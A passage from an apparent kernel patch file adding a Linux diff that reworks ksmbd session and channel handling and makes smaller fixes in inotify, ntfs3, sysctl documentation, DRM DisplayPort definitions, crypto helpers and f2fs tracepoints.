+ struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
+ {
+-	struct channel *chann;
+-
+-	list_for_each_entry(chann, &sess->ksmbd_chann_list, chann_list) {
+-		if (chann->conn == conn)
+-			return chann;
+-	}
+-
+-	return NULL;
++	return xa_load(&sess->ksmbd_chann_list, (long)conn);
+ }
+ 
+ /**
+@@ -254,7 +247,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 
+ 	rsp = smb2_get_msg(work->response_buf);
+ 
+-	WARN_ON(ksmbd_conn_good(work));
++	WARN_ON(ksmbd_conn_good(conn));
+ 
+ 	rsp->StructureSize = cpu_to_le16(65);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+@@ -284,7 +277,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+ 	conn->use_spnego = true;
+ 
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 	return 0;
+ }
+ 
+@@ -574,7 +567,7 @@ int smb2_check_user_session(struct ksmbd_work *work)
+ 	    cmd == SMB2_SESSION_SETUP_HE)
+ 		return 0;
+ 
+-	if (!ksmbd_conn_good(work))
++	if (!ksmbd_conn_good(conn))
+ 		return -EINVAL;
+ 
+ 	sess_id = le64_to_cpu(req_hdr->SessionId);
+@@ -592,6 +585,7 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
+ 	struct ksmbd_user *prev_user;
+ 	struct channel *chann;
++	long index;
+ 
+ 	if (!prev_sess)
+ 		return;
+@@ -605,10 +599,8 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 		return;
+ 
+ 	prev_sess->state = SMB2_SESSION_EXPIRED;
+-	write_lock(&prev_sess->chann_lock);
+-	list_for_each_entry(chann, &prev_sess->ksmbd_chann_list, chann_list)
+-		chann->conn->status = KSMBD_SESS_EXITING;
+-	write_unlock(&prev_sess->chann_lock);
++	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
++		ksmbd_conn_set_exiting(chann->conn);
+ }
+ 
+ /**
+@@ -1075,7 +1067,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Received negotiate request\n");
+ 	conn->need_neg = false;
+-	if (ksmbd_conn_good(work)) {
++	if (ksmbd_conn_good(conn)) {
+ 		pr_err("conn->tcp_status is already in CifsGood State\n");
+ 		work->send_no_response = 1;
+ 		return rc;
+@@ -1230,7 +1222,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	}
+ 
+ 	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 
+ err_out:
+ 	if (rc < 0)
+@@ -1520,19 +1512,14 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 
+ binding_session:
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1606,19 +1593,14 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ 	}
+ 
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1661,6 +1643,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = 0;
+ 	inc_rfc1001_len(work->response_buf, 9);
+ 
++	ksmbd_conn_lock(conn);
+ 	if (!req->hdr.SessionId) {
+ 		sess = ksmbd_smb2_session_create();
+ 		if (!sess) {
+@@ -1708,6 +1691,12 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++
+ 		if (ksmbd_session_lookup(conn, sess_id)) {
+ 			rc = -EACCES;
+ 			goto out_err;
+@@ -1732,12 +1721,20 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			rc = -ENOENT;
+ 			goto out_err;
+ 		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
+ 	}
+ 	work->sess = sess;
+ 
+-	if (sess->state == SMB2_SESSION_EXPIRED)
+-		sess->state = SMB2_SESSION_IN_PROGRESS;
+-
+ 	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+ 	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+@@ -1767,8 +1764,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				goto out_err;
+ 			}
+ 
+-			ksmbd_conn_set_good(work);
+-			sess->state = SMB2_SESSION_VALID;
++			if (!ksmbd_conn_need_reconnect(conn)) {
++				ksmbd_conn_set_good(conn);
++				sess->state = SMB2_SESSION_VALID;
++			}
+ 			kfree(sess->Preauth_HashValue);
+ 			sess->Preauth_HashValue = NULL;
+ 		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+@@ -1790,8 +1789,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				if (rc)
+ 					goto out_err;
+ 
+-				ksmbd_conn_set_good(work);
+-				sess->state = SMB2_SESSION_VALID;
++				if (!ksmbd_conn_need_reconnect(conn)) {
++					ksmbd_conn_set_good(conn);
++					sess->state = SMB2_SESSION_VALID;
++				}
+ 				if (conn->binding) {
+ 					struct preauth_session *preauth_sess;
+ 
+@@ -1859,14 +1860,17 @@ out_err:
+ 			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
+ 				try_delay = true;
+ 
+-			xa_erase(&conn->sessions, sess->id);
+-			ksmbd_session_destroy(sess);
+-			work->sess = NULL;
+-			if (try_delay)
++			sess->last_active = jiffies;
++			sess->state = SMB2_SESSION_EXPIRED;
++			if (try_delay) {
++				ksmbd_conn_set_need_reconnect(conn);
+ 				ssleep(5);
++				ksmbd_conn_set_need_negotiate(conn);
++			}
+ 		}
+ 	}
+ 
++	ksmbd_conn_unlock(conn);
+ 	return rc;
+ }
+ 
+@@ -2091,21 +2095,25 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_session *sess;
++	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
++	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	/* setting CifsExiting here may race with start_tcp_sess */
+-	ksmbd_conn_set_need_reconnect(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
+ 	ksmbd_close_session_fds(work);
+-	ksmbd_conn_wait_idle(conn);
++	ksmbd_conn_wait_idle(conn, sess_id);
+ 
++	/*
++	 * Re-lookup session to validate if session is deleted
++	 * while waiting request complete
++	 */
++	sess = ksmbd_session_lookup_all(conn, sess_id);
+ 	if (ksmbd_tree_conn_session_logoff(sess)) {
+-		struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+@@ -2117,9 +2125,7 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 
+ 	ksmbd_free_user(sess->user);
+ 	sess->user = NULL;
+-
+-	/* let start_tcp_sess free connection info now */
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
+ 	return 0;
+ }
+ 
+@@ -6947,7 +6953,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 
+ 		nolock = 1;
+ 		/* check locks in connection list */
+-		read_lock(&conn_list_lock);
++		down_read(&conn_list_lock);
+ 		list_for_each_entry(conn, &conn_list, conns_list) {
+ 			spin_lock(&conn->llist_lock);
+ 			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
+@@ -6964,7 +6970,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 						list_del(&cmp_lock->flist);
+ 						list_del(&cmp_lock->clist);
+ 						spin_unlock(&conn->llist_lock);
+-						read_unlock(&conn_list_lock);
++						up_read(&conn_list_lock);
+ 
+ 						locks_free_lock(cmp_lock->fl);
+ 						kfree(cmp_lock);
+@@ -6986,7 +6992,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    cmp_lock->start > smb_lock->start &&
+ 				    cmp_lock->start < smb_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("previous lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -6995,7 +7001,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    smb_lock->start > cmp_lock->start &&
+ 				    smb_lock->start < cmp_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("current lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -7006,14 +7012,14 @@ int smb2_lock(struct ksmbd_work *work)
+ 				      cmp_lock->end >= smb_lock->end)) &&
+ 				    !cmp_lock->zero_len && !smb_lock->zero_len) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("Not allow lock operation on exclusive lock range\n");
+ 					goto out;
+ 				}
+ 			}
+ 			spin_unlock(&conn->llist_lock);
+ 		}
+-		read_unlock(&conn_list_lock);
++		up_read(&conn_list_lock);
+ out_check_cl:
+ 		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
+ 			pr_err("Try to unlock nolocked range\n");
+@@ -8428,14 +8434,11 @@ int smb3_check_sign_req(struct ksmbd_work *work)
+ 	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return 0;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key) {
+@@ -8495,14 +8498,11 @@ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ 	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, work->conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key)
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+index f4baa9800f6ee..dd10f8031606b 100644
+--- a/fs/ksmbd/smb2pdu.h
++++ b/fs/ksmbd/smb2pdu.h
+@@ -61,6 +61,8 @@ struct preauth_integrity_info {
+ #define SMB2_SESSION_IN_PROGRESS	BIT(0)
+ #define SMB2_SESSION_VALID		BIT(1)
+ 
++#define SMB2_SESSION_TIMEOUT		(10 * HZ)
++
+ struct create_durable_req_v2 {
+ 	struct create_context ccontext;
+ 	__u8   Name[8];
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 20e85e2701f26..eff7a1d793f00 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -333,7 +333,7 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		if (length == -EINTR) {
+ 			total_read = -ESHUTDOWN;
+ 			break;
+-		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
++		} else if (ksmbd_conn_need_reconnect(conn)) {
+ 			total_read = -EAGAIN;
+ 			break;
+ 		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
+diff --git a/fs/notify/inotify/inotify_fsnotify.c b/fs/notify/inotify/inotify_fsnotify.c
+index 49cfe2ae6d23d..993375f0db673 100644
+--- a/fs/notify/inotify/inotify_fsnotify.c
++++ b/fs/notify/inotify/inotify_fsnotify.c
+@@ -65,7 +65,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	struct fsnotify_event *fsn_event;
+ 	struct fsnotify_group *group = inode_mark->group;
+ 	int ret;
+-	int len = 0;
++	int len = 0, wd;
+ 	int alloc_len = sizeof(struct inotify_event_info);
+ 	struct mem_cgroup *old_memcg;
+ 
+@@ -80,6 +80,13 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	i_mark = container_of(inode_mark, struct inotify_inode_mark,
+ 			      fsn_mark);
+ 
++	/*
++	 * We can be racing with mark being detached. Don't report event with
++	 * invalid wd.
++	 */
++	wd = READ_ONCE(i_mark->wd);
++	if (wd == -1)
++		return 0;
+ 	/*
+ 	 * Whoever is interested in the event, pays for the allocation. Do not
+ 	 * trigger OOM killer in the target monitoring memcg as it may have
+@@ -110,7 +117,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	fsn_event = &event->fse;
+ 	fsnotify_init_event(fsn_event);
+ 	event->mask = mask;
+-	event->wd = i_mark->wd;
++	event->wd = wd;
+ 	event->sync_cookie = cookie;
+ 	event->name_len = len;
+ 	if (len)
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 45f95c1cb2584..e0cdc91d88a85 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -661,7 +661,8 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+ 
+-	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
++	wnd->free_bits =
++		kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/namei.c b/fs/ntfs3/namei.c
+index bc22cc321a74b..a9549e73081fb 100644
+--- a/fs/ntfs3/namei.c
++++ b/fs/ntfs3/namei.c
+@@ -86,6 +86,16 @@ static struct dentry *ntfs_lookup(struct inode *dir, struct dentry *dentry,
+ 		__putname(uni);
+ 	}
+ 
++	/*
++	 * Check for a null pointer
++	 * If the MFT record of ntfs inode is not a base record, inode->i_op can be NULL.
++	 * This causes null pointer dereference in d_splice_alias().
++	 */
++	if (!IS_ERR_OR_NULL(inode) && !inode->i_op) {
++		iput(inode);
++		inode = ERR_PTR(-EINVAL);
++	}
++
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 9cc396b117bfd..0f38d558169a1 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -436,9 +436,6 @@ static inline u64 attr_svcn(const struct ATTRIB *attr)
+ 	return attr->non_res ? le64_to_cpu(attr->nres.svcn) : 0;
+ }
+ 
+-/* The size of resident attribute by its resident size. */
+-#define BYTES_PER_RESIDENT(b) (0x18 + (b))
+-
+ static_assert(sizeof(struct ATTRIB) == 0x48);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->res) == 0x08);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->nres) == 0x38);
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 48f2d60bd78a2..72f2b373221ed 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1281,7 +1281,10 @@ out:
+  * __register_sysctl_table - register a leaf sysctl table
+  * @set: Sysctl tree to register on
+  * @path: The path to the directory the sysctl table is in.
+- * @table: the top-level table structure
++ * @table: the top-level table structure without any child. This table
++ * 	 should not be free'd after registration. So it should not be
++ * 	 used on stack. It can either be a global or dynamically allocated
++ * 	 by the caller and free'd later after sysctl unregistration.
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1302,9 +1305,12 @@ out:
+  * proc_handler - the text handler routine (described below)
+  *
+  * extra1, extra2 - extra pointers usable by the proc handler routines
++ * XXX: we should eventually modify these to use long min / max [0]
++ * [0] https://lkml.kernel.org/87zgpte9o4.fsf@email.froward.int.ebiederm.org
+  *
+  * Leaf nodes in the sysctl tree will be represented by a single file
+- * under /proc; non-leaf nodes will be represented by directories.
++ * under /proc; non-leaf nodes (where child is not NULL) are not allowed,
++ * sysctl_check_table() verifies this.
+  *
+  * There must be a proc_handler routine for any terminal nodes.
+  * Several default handlers are available to cover common cases -
+@@ -1346,7 +1352,7 @@ struct ctl_table_header *__register_sysctl_table(
+ 
+ 	spin_lock(&sysctl_lock);
+ 	dir = &set->dir;
+-	/* Reference moved down the diretory tree get_subdir */
++	/* Reference moved down the directory tree get_subdir */
+ 	dir->header.nreg++;
+ 	spin_unlock(&sysctl_lock);
+ 
+@@ -1363,6 +1369,11 @@ struct ctl_table_header *__register_sysctl_table(
+ 		if (namelen == 0)
+ 			continue;
+ 
++		/*
++		 * namelen ensures if name is "foo/bar/yay" only foo is
++		 * registered first. We traverse as if using mkdir -p and
++		 * return a ctl_dir for the last directory entry.
++		 */
+ 		dir = get_subdir(dir, name, namelen);
+ 		if (IS_ERR(dir))
+ 			goto fail;
+@@ -1388,8 +1399,15 @@ fail:
+ 
+ /**
+  * register_sysctl - register a sysctl table
+- * @path: The path to the directory the sysctl table is in.
+- * @table: the table structure
++ * @path: The path to the directory the sysctl table is in. If the path
++ * 	doesn't exist we will create it for you.
++ * @table: the table structure. The calller must ensure the life of the @table
++ * 	will be kept during the lifetime use of the syctl. It must not be freed
++ * 	until unregister_sysctl_table() is called with the given returned table
++ * 	with this registration. If your code is non modular then you don't need
++ * 	to call unregister_sysctl_table() and can instead use something like
++ * 	register_sysctl_init() which does not care for the result of the syctl
++ * 	registration.
+  *
+  * Register a sysctl table. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1405,8 +1423,11 @@ EXPORT_SYMBOL(register_sysctl);
+ 
+ /**
+  * __register_sysctl_init() - register sysctl table to path
+- * @path: path name for sysctl base
+- * @table: This is the sysctl table that needs to be registered to the path
++ * @path: path name for sysctl base. If that path doesn't exist we will create
++ * 	it for you.
++ * @table: This is the sysctl table that needs to be registered to the path.
++ * 	The caller must ensure the life of the @table will be kept during the
++ * 	lifetime use of the sysctl.
+  * @table_name: The name of sysctl table, only used for log printing when
+  *              registration fails
+  *
+@@ -1418,10 +1439,7 @@ EXPORT_SYMBOL(register_sysctl);
+  * register_sysctl() failing on init are extremely low, and so for both reasons
+  * this function does not return any error as it is used by initialization code.
+  *
+- * Context: Can only be called after your respective sysctl base path has been
+- * registered. So for instance, most base directories are registered early on
+- * init before init levels are processed through proc_sys_init() and
+- * sysctl_init_bases().
++ * Context: if your base directory does not exist it will be created for you.
+  */
+ void __init __register_sysctl_init(const char *path, struct ctl_table *table,
+ 				 const char *table_name)
+@@ -1551,6 +1569,7 @@ out:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this call so avoid its use.
+  *
+  * See __register_sysctl_table for more details.
+  */
+@@ -1622,6 +1641,7 @@ err_register_leaves:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this caller so avoid future uses of it.
+  *
+  * See __register_sysctl_paths for more details.
+  */
+diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
+index f50c5d1725da5..224b860647083 100644
+--- a/include/crypto/algapi.h
++++ b/include/crypto/algapi.h
+@@ -265,4 +265,11 @@ enum {
+ 	CRYPTO_MSG_ALG_LOADED,
+ };
+ 
++static inline void crypto_request_complete(struct crypto_async_request *req,
++					   int err)
++{
++	crypto_completion_t complete = req->complete;
++	complete(req, err);
++}
++
+ #endif	/* _CRYPTO_ALGAPI_H */
+diff --git a/include/drm/display/drm_dp.h b/include/drm/display/drm_dp.h
+index e934aab357bea..05f2cc03d03d9 100644
+--- a/include/drm/display/drm_dp.h
++++ b/include/drm/display/drm_dp.h
+@@ -240,6 +240,8 @@
+ #define DP_DSC_SUPPORT                      0x060   /* DP 1.4 */
+ # define DP_DSC_DECOMPRESSION_IS_SUPPORTED  (1 << 0)
+ # define DP_DSC_PASSTHROUGH_IS_SUPPORTED    (1 << 1)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_COMP_TO_COMP    (1 << 2)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_UNCOMP_TO_COMP  (1 << 3)
+ 
+ #define DP_DSC_REV                          0x061
+ # define DP_DSC_MAJOR_MASK                  (0xf << 0)
+@@ -278,12 +280,14 @@
+ 
+ #define DP_DSC_BLK_PREDICTION_SUPPORT       0x066
+ # define DP_DSC_BLK_PREDICTION_IS_SUPPORTED (1 << 0)
++# define DP_DSC_RGB_COLOR_CONV_BYPASS_SUPPORT (1 << 1)
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_LOW       0x067   /* eDP 1.4 */
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_HI        0x068   /* eDP 1.4 */
+ # define DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK  (0x3 << 0)
+-# define DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT 8
++# define DP_DSC_MAX_BPP_DELTA_VERSION_MASK  (0x3 << 5)	/* eDP 1.5 & DP 2.0 */
++# define DP_DSC_MAX_BPP_DELTA_AVAILABILITY  (1 << 7)	/* eDP 1.5 & DP 2.0 */
+ 
+ #define DP_DSC_DEC_COLOR_FORMAT_CAP         0x069
+ # define DP_DSC_RGB                         (1 << 0)
+@@ -345,11 +349,13 @@
+ # define DP_DSC_24_PER_DP_DSC_SINK          (1 << 2)
+ 
+ #define DP_DSC_BITS_PER_PIXEL_INC           0x06F
++# define DP_DSC_RGB_YCbCr444_MAX_BPP_DELTA_MASK 0x1f
++# define DP_DSC_RGB_YCbCr420_MAX_BPP_DELTA_MASK 0xe0
+ # define DP_DSC_BITS_PER_PIXEL_1_16         0x0
+ # define DP_DSC_BITS_PER_PIXEL_1_8          0x1
+ # define DP_DSC_BITS_PER_PIXEL_1_4          0x2
+ # define DP_DSC_BITS_PER_PIXEL_1_2          0x3
+-# define DP_DSC_BITS_PER_PIXEL_1            0x4
++# define DP_DSC_BITS_PER_PIXEL_1_1          0x4
+ 
+ #define DP_PSR_SUPPORT                      0x070   /* XXX 1.2? */
+ # define DP_PSR_IS_SUPPORTED                1
+diff --git a/include/drm/display/drm_dp_helper.h b/include/drm/display/drm_dp_helper.h
+index ab55453f2d2cd..ade9df59e156a 100644
+--- a/include/drm/display/drm_dp_helper.h
++++ b/include/drm/display/drm_dp_helper.h
+@@ -181,9 +181,8 @@ static inline u16
+ drm_edp_dsc_sink_output_bpp(const u8 dsc_dpcd[DP_DSC_RECEIVER_CAP_SIZE])
+ {
+ 	return dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_LOW - DP_DSC_SUPPORT] |
+-		(dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK <<
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT);
++		((dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
++		  DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK) << 8);
+ }
+ 
+ static inline u32
+diff --git a/include/linux/crypto.h b/include/linux/crypto.h
+index 2324ab6f1846b..e3c4be29aaccb 100644
+--- a/include/linux/crypto.h
++++ b/include/linux/crypto.h
+@@ -176,6 +176,7 @@ struct crypto_async_request;
+ struct crypto_tfm;
+ struct crypto_type;
+ 
++typedef struct crypto_async_request crypto_completion_data_t;
+ typedef void (*crypto_completion_t)(struct crypto_async_request *req, int err);
+ 
+ /**
+@@ -595,6 +596,11 @@ struct crypto_wait {
+ /*
+  * Async ops completion helper functioons
+  */
++static inline void *crypto_get_completion_data(crypto_completion_data_t *req)
++{
++	return req->data;
++}
++
+ void crypto_req_done(struct crypto_async_request *req, int err);
+ 
+ static inline int crypto_wait_req(int err, struct crypto_wait *wait)
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 45c3d62e616d8..95f33dadb2be2 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -567,6 +567,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F3 0x166d
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F3 0x14e3
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F3 0x14f3
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F3 0x12fb
+ #define PCI_DEVICE_ID_AMD_CNB17H_F3	0x1703
+ #define PCI_DEVICE_ID_AMD_LANCE		0x2000
+ #define PCI_DEVICE_ID_AMD_LANCE_HOME	0x2001
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index eb53e96b7a29c..5f58684f6107a 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -48,6 +48,7 @@ TRACE_DEFINE_ENUM(CP_DISCARD);
+ TRACE_DEFINE_ENUM(CP_TRIMMED);
+ TRACE_DEFINE_ENUM(CP_PAUSE);
+ TRACE_DEFINE_ENUM(CP_RESIZE);
++TRACE_DEFINE_ENUM(EX_READ);
+ 
+ #define show_block_type(type)						\
+ 	__print_symbolic(type,						\
+@@ -1559,28 +1560,31 @@ TRACE_EVENT(f2fs_issue_flush,
+ 
+ TRACE_EVENT(f2fs_lookup_extent_tree_start,
+ 
+-	TP_PROTO(struct inode *inode, unsigned int pgofs),
++	TP_PROTO(struct inode *inode, unsigned int pgofs, enum extent_type type),
+ 
+-	TP_ARGS(inode, pgofs),
++	TP_ARGS(inode, pgofs, type),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+ 		__field(unsigned int, pgofs)
++		__field(enum extent_type, type)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev = inode->i_sb->s_dev;
+ 		__entry->ino = inode->i_ino;
+ 		__entry->pgofs = pgofs;
++		__entry->type = type;
+ 	),
+ 
+-	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u",
++	TP_printk("dev = (%d,%d), ino = %lu, pgofs = %u, type = %s",
+ 		show_dev_ino(__entry),
+-		__entry->pgofs)
++		__entry->pgofs,
++		__entry->type == EX_READ ? "Read" : "N/A")
+ );
+ 
+-TRACE_EVENT_CONDITION(f2fs_lookup_extent_tree_end,
++TRACE_EVENT_CONDITION(f2fs_lookup_read_extent_tree_end,
+ 
+ 	TP_PROTO(struct inode *inode, unsigned int pgofs,
+ 						struct extent_info *ei),
+@@ -1594,8 +1598,8 @@ TRACE_EVENT_CONDITION(f2fs_lookup_extent_tree_end,
+ 		__field(ino_t,	ino)
+ 		__field(unsigned int, pgofs)
+ 		__field(unsigned int, fofs)
+-		__field(u32, blk)
+ 		__field(unsigned int, len)
++		__field(u32, blk)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -1603,26 +1607,26 @@ TRACE_EVENT_CONDITION(f2fs_lookup_extent_tree_end,
+ 		__entry->ino = inode->i_ino;
+ 		__entry->pgofs = pgofs;
+ 		__entry->fofs = ei->fofs;
+-		__entry->blk = ei->blk;
+ 		__entry->len = ei->len;
++		__entry->blk = ei->blk;
+ 	),
+ 
